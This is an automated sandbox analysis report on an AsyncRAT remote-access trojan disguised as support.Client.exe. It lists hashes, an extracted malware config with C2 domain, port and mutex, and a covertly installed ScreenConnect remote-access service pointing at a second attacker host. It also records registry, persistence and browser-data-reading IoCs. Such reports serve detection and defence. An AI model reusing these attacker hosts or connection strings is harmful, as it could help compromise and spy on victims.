asyncrat | fe4345e927352f9ef225d59bb664aafd838f028c569d074509351899a009e3f4

Analysis

max time kernel
135s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06/08/2024, 09:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

support.Client.exe
Size

84KB
MD5

2b85c04408d16bd6e493eb59b87c54f2
SHA1

0c543e947d75e040795227e5e8106897a63f23a8
SHA256

fe4345e927352f9ef225d59bb664aafd838f028c569d074509351899a009e3f4
SHA512

a8474cbd214664abd7fa0ac8fc14fcf3bbd8561d7fbae2339ae92c63490d2247ca76b0c60fde37e16bc17a276e7168baaae172364ac12110534b92810166396d
SSDEEP

1536:bazWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYY27QkPx3S:pFNpo6rIKlUE8fbkqRfbaQlaYY2Lx3S

Score

10^/10

asyncrat zekzek discovery persistence privilege_escalation rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

zekzek

alertazazws123.ddnsgeek.com:7707

Mutex

AsyncMutex_ggrt5syb5erw

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4168 created 3424	4168	Tx.pif	56
PID 4168 created 3424	4168	Tx.pif	56

Downloads MZ/PE file

Manipulates Digital Signatures 1 TTPs 4 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	support.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	support.Client.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	support.Client.exe
Key deleted	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	support.Client.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f7966cef-4335-4600-89a4-f5a3714fafd8)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\PW3K10D3.CM8\\E4BXWJXO.OCE\\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\\ScreenConnect.ClientService.exe\" \"?y=Guest&h=edcthmedu.serveblog.net&p=8041&s=f7966cef-4335-4600-89a4-f5a3714fafd8&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA21CJimzipkyoRoHNSmyfUAAAAAACAAAAAAAQZgAAAAEAACAAAAAWJzUeP30nqIz59zniyt69ITGDTtJNfxL2wTHi4i1iWgAAAAAOgAAAAAIAACAAAABPz9OF3jBd6wOq6MFyxgMyQUCV20GFBmb%2fm6tEXgaQI6AEAAAO995M%2fRT2LdAkaNq7KT%2bSwZaxwF%2fYDHZPIFIgQ0SACb9r87a8yG6yZdLmF8ZRJxa0zznkxnY0D5LOXh8bFLgnEM6x6IFF%2bP1OT3%2b80MEUcOYcdsVYH6QEnQjsqQIqTlnaW9zd6NoKuXdEPlnVvUDunqDI5gqLry%2fy8CptbrK1reHixJ1udKvIIq3y3L5Hz9JMqXfnLqqCZTvGHwRbDcCzkWtLcKLHMx0UjkZeWFMmkyoA41sk0DrTuNb4BdW8Ktec%2f0rTpbe5RJVZMZlpYgV4M%2f7%2fyByfLSSJ0MzbZEXjHRbdk2GuIYhvg2OcDU4XXMyo6gSjvFN8bqWX%2bW9v5TpMfALiX0FIARxVMLmUgj2KxXs8JXbBTgPJPufEi6CMAxdinD6fAMlW8BR0Zg6E7ufHdHvCZllUsUha4ufOQYeyoT%2b9cEvAEC2j%2fLbpVFe4uYLhpwWNQmR4SWDNW4YI%2fecycR3lY7T5tQZK2Rv5OP22E%2fNccfVtJjRNGV4BzbMA1TQU6ssND%2fX%2fBMIVwGOw78ft7WI7mkSDZZxChZ26It00oUjmUd8PT0G9eKBXYiBgcjs9WvgW%2blDkx2c1leEtURPr3qPtxN%2fjhYvlLiJMFT3jTedcFh8UQ1GKi9o2UuA1nKfoiYWKRgjfChpyH7AnGbPqXxYmKmG5Q8KmfuzUhXXlvEHFF8rwNLB0F0eYCwAxe%2flsUR40G66szvCqkqUnHPP%2fppu13Ivdcvk41YbyTAn8EW8ZkkVWg%2bhF1fZ3BUUxL0mTxR1d6ZsTup%2bua%2bBloLLrPZrObwh4ZT4ybDRSYXDIs%2fY5FdWscM9hrkbMSAEyaT0SVbfvoGD4C70SVmzhfd2gGlLdUr4JzdelAS24T8rRC0Dgw37gDc%2bsqpznZZ9FNV5jTuKzi1haC2s1Cq3PdFyW%2bnKDlqw1GN9OaT%2b5N9w2Y9YGfl7Ywpg0Egngq%2bW9IRIAu5FzOQoPdbKxTvzo6%2bBi4uRjuU0Z95E%2fdblWE0vqdYD%2bJOySlM0kVb4htjijNvC8ayUVXWnnv9hwBDrojqq6XfBi0tQ6FxwdRIXJtVU62P3lyVppSobrGMek5rcrtwduGwTGXSlbXrFKlzoOc3WWAzREDHmuzD%2bW1cT%2fCidZohN4TBbIpiO8YKLBXlELB%2fi%2f4GDO3plZS%2fchBUqFbNSgIaDsF9zOksL7%2f5aKGLhE5VojcBdfZdDGF5SqxBxabH9V%2faDuEvSqmmY2TlxOLRiHFKxFVckiOiLG%2fUzFfU5vT6BSY4L56ZLrOCwnP8qmor0gWZY%2bOaBU5tjQiLrzysURV%2bBIw5rnrngf%2bkISXVNibzOfJa9pK1UC%2bEQ1IzXu%2fPWDYsXA7IQd5WBDYU2NpncUPLc8y3rN8SEjgmYrbNtFhClNzh7%2fjXv5AebeueawC7WIMD54yLVzhahYzekrTcsNbL23Fa%2bCmFENuqAl4FljtrulRJJU20kNSGmZrOE90foKvyhGMONSqmismVPeX6u6hXCn5EdgFhvdOh2jvP4dCF076H%2fJ4ogGLi7FaC5Uqtvd3VuybyXy7MdIX40Ze9JYA3UiiETatqL6HsmnzS4eyEAAAACxdknAFr17WxzK66yLTAb0GzUY2MDaMxhZZh4rpiEE6NqkGdQawZiv56g8B%2bhQpmPpvuF1oOZEWHJQd8fDo%2bUO&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73a0227d089fe193)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=edcthmedu.serveblog.net&p=8041&s=0f8c9a42-9255-4cc9-a86d-495b4545c3f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA21CJimzipkyoRoHNSmyfUAAAAAACAAAAAAAQZgAAAAEAACAAAABsXU1X1uOPDsbiPprY28JeDb4xfoXbgJrS71APrUCVIQAAAAAOgAAAAAIAACAAAAAU4cZEd4AJ1dYd%2fWtG6D%2bqmYKnXuIBmY9Z1qjGLlXPbKAEAAD%2bbo8z9ECMo%2fnkVTHJTThU4YR45I%2bz4DrSEgP3o7YBLWD3bbLVYDEcibkoRYq5qEaIdumOnjaNqcdOsJC3p4bJBozyXQZQNpm0F%2fyGyGewUoFUWcTVT4pamEkqNpxYcQ2Y8drYtWXUo%2b%2f0ckxZ8oR%2bIFCeBNXOLux%2biuTQPibYu4B3%2beay3iMWsITeObF5Es2dzP3BUE7dOa0hzkNxW20n%2bvElIa4s5IoO1aqvim%2fcpHtBn0moeGkG62CR5dWXvVxyE%2fSWL4dQrORbnWBBTaXiiv57UdlCSowYdvS%2fGx5XDXb8mqv1WJqRmGJWk%2fZgwfj8IzE1KyAJ89zT9tWtLLGSftyaxA39pnVBbxGTMnugwFq8tKYbX0zS0WBuRwfwf20I9SzhT4Zt%2f6iiz48Uu1P2XK51%2b38OJ8KPEW%2fubHsVCBH0XXwX5rRmCgqm7%2fB7Gu1mr8KAjYot0sUlEVJt6wt39EmYPKRPeDUNzvOI9e4IuNSeu5pmfTTmuGEMdkt6afxIOHQxpW7l%2fFPbQqgmcWNY0gRmeGmSvZnw%2fWc62SFoyJqof5IK3iAaOpeQniZ2m3pU%2f3iRJL3b5gElwUJXu%2bJcGW%2fB5jwk26WSU6L9X3vqs4HiIIcPFD5UHHHlNn8iNQmGjqaRLHTipejXnAkuC%2b7M0zVWuxll%2fY%2fC3Nk4wGcXhf5trUAc26bzCd72wqNt9gaXbQHVwlSR%2bHkHKZliM6mjNFNO83H%2b05M5SrIpR3aI%2b9EMJU1PHSRpUYPW2pJgxrTE9ExeNEvZcC2RjigbnjWYd3c%2fZPkHGtRUXkcHAq%2fIPLvxQ%2fhONedbF8gG30jBwDGtbBo3P2dTaMN8KVPWtv2v3nRBSyMRuAm02OXeX0imIRkN0GpmYmQksKG6beTaXpHPaHiVU4iomDGLGSTLZHcfe3K2%2fhWVZUNo8ZJY5OGJwvDVqdGUOUDKl5kQH3CIqX4fluvL9Tm7yYd6uHKoj0xedLsSmXeSBeUCKyI0Ig0zhaVY6TltaQ31WGEPJ3NvNMnpD2IuiQVKYcXgpxXercET9ticB7ndY8dDXT5AnRavaX90k%2fN1Lg0W0i424%2fe0MmNdhErp2X1E7aMUGQRFQOqRCaxRWQslZIQILHrAUkrG4QW%2bF3wOeCqFwfaPyUNZf7%2bgD0emzqY9MHIatTsQpV%2fgrJUbf1yqEYIxcMCE1ryeG9EgI0GY%2bjH6piltDseEW%2fPQ1MIyJblM601X1OLAaWvvoYnTuB%2beR381%2bsuQ3HJjx%2bVv8KXQAdm8THMmDRA5YFyWs44%2b9KLQ1Uc0DoIXJD7rLn4%2f9F6O0hB%2fvPGLqXtl%2fudug35rwozk%2bGgKP2fVvo7wPwvJujWycQgWDYHzBlDDlEdb6Y%2bjeHTUGXmq7G5L7oRoA7mheKk4qll6YgK191i3GxgJPUM3HXVct30%2fkuALo3nALIJxXpN5Y33%2fJehaGHqkGQ4RV3liyR79%2fptuVcEdql%2b69%2ff6spajrqQli2BprH9hoQWbPixDtGf2X2h5ICOBvoZbhfx9aEPQ4F0dxdQhnKDMY0E8YJeTDW%2byVM9BFDOYcRrd4c0fRJX9SunyVkAAAACyaThZ4hvMvCufbKtHf09r%2ftNyCd%2bnD%2bjj%2faBeaIpEYJ5DNoHalqL0nteFoPBglwrmLk8Q0y533uUbGXFjKc38&t=mobic\""	ScreenConnect.ClientService.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	ScreenConnect.WindowsClient.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 13 IoCs

pid	Process
632	ScreenConnect.WindowsClient.exe
832	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
4952	ScreenConnect.WindowsClient.exe
2400	ScreenConnect.WindowsClient.exe
4612	ScreenConnect.WindowsClient.exe
400	Mozanm.exe
4168	Tx.pif
2296	ScreenConnect.ClientSetup.exe
2880	ScreenConnect.ClientService.exe
1780	ScreenConnect.WindowsClient.exe
1792	ScreenConnect.WindowsClient.exe
348	jsc.exe

Loads dropped DLL 36 IoCs

pid	Process
832	ScreenConnect.ClientService.exe
832	ScreenConnect.ClientService.exe
832	ScreenConnect.ClientService.exe
832	ScreenConnect.ClientService.exe
832	ScreenConnect.ClientService.exe
832	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3100	ScreenConnect.ClientService.exe
3016	MsiExec.exe
3652	rundll32.exe
3652	rundll32.exe
3652	rundll32.exe
3652	rundll32.exe
3652	rundll32.exe
3652	rundll32.exe
3652	rundll32.exe
3016	MsiExec.exe
3016	MsiExec.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe
2880	ScreenConnect.ClientService.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000023455-399.dat	autoit_exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientSetup.exe.log	ScreenConnect.ClientSetup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\qbld4os1.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (73a0227d089fe193)\qbld4os1.newcfg	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\Client.Override.resources	msiexec.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5E9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5E9.tmp-\ScreenConnect.InstallerActions.dll	rundll32.exe
File created	C:\Windows\Installer\wix{D148B9F4-189A-43AC-84BA-33C024DE3891}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\Installer\{D148B9F4-189A-43AC-84BA-33C024DE3891}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF81C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57f4df.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5E9.tmp-\ScreenConnect.Windows.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIF5E9.tmp-\CustomAction.config	rundll32.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{D148B9F4-189A-43AC-84BA-33C024DE3891}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF8BB.tmp	msiexec.exe
File created	C:\Windows\Installer\{D148B9F4-189A-43AC-84BA-33C024DE3891}\DefaultIcon	msiexec.exe
File created	C:\Windows\Installer\e57f4df.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5E9.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIF5E9.tmp-\ScreenConnect.Core.dll	rundll32.exe
